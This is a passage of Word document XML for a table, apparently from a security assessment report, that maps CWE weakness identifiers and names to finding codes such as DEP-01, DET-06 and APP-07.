            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-08, DET-09, DET-18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-1104</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Use of Unmaintained Third Party Components</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-06, DEP-01, DEP-02, DEP-03, DEP-04, DEP-06, DEP-07, DEP-08, DEP-09, DEP-10, DEP-12, DET-16, PB2-17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-1127</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-116</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Improper Encoding or Escaping of Output</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-10, DET-02, DET-05, DET-12, PB1-10, PB2-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-117</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-1188</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Initialization of a Resource with an Insecure Default</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-04, APP-09, APP-12, DET-07, PB2-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-1236</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Improper Neutralization of Formula Elements in a CSV File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-1286</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Improper Validation of Syntactic Correctness of Input</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-1333</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Inefficient Regular Expression Complexity (ReDoS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-05, CF-07, PB1-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-1357</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Reliance on Insufficiently Trustworthy Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-05, DEP-07, DEP-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-1395</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dependency on Vulnerable Third-Party Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-01, DEP-02, DEP-04, DEP-08, DEP-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-172</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-176</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-178</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Improper Handling of Case Sensitivity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-183</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-04, PB2-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-184</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Incomplete List of Disallowed Inputs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-248</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-14, PB1-12, PB1-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-250</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Execution with Unnecessary Privileges</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-259</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Use of Hard-coded Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-272</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
